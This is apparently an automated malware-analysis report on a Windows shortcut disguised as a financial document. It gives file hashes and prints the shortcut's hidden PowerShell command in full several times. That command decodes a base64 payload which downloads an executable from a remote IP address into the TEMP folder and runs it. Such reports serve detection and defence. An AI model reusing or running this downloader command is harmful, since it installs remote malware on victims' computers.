|
Hash | Hash Value |
|---|---|
| MD5 | dc733f068184e3adba0100f33a8ee55a
|
| Sha1 | eb11ef784534e1b729f551e475904ef29080325f
|
| Sha256 | 292ef9c837eb247376d40aec091bac4b2ca4195d15614895cc4629d4b62d4604
|
| Sha384 | 9a5e5eebeebe1b879f480cff035eb37c3825144908588a2232366a6534e1d1de07044a9795b70c96569ceaac3ef92161
|
| Sha512 | 142ad755e169c2452b802ac706d0be37e4f66290ffd66c32bbb3bb3ab0f5e6fec0b03218b7b13ddd20d3e71de6fb66e52e07fb335c1cbc7960e66247b4b5c2ff
|
| SSDeep | 48:8WfJhs/qCD4npTX46to/A3gm0lO9pIiLxKpKTai6:8y83EeA3ylO9pjng
|
| TLSH | 7851102516F20218E2B2AB3568F97615CDB3BD26ED35AE4E014C07851B23A00DE24F3F
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=='))); |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=='))); Malicious |
oustanding!$&()blance500%&00$&09finalrevised.lnk |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious |
oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious |
oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious |
oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious |
oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [Deobfuscated PS] |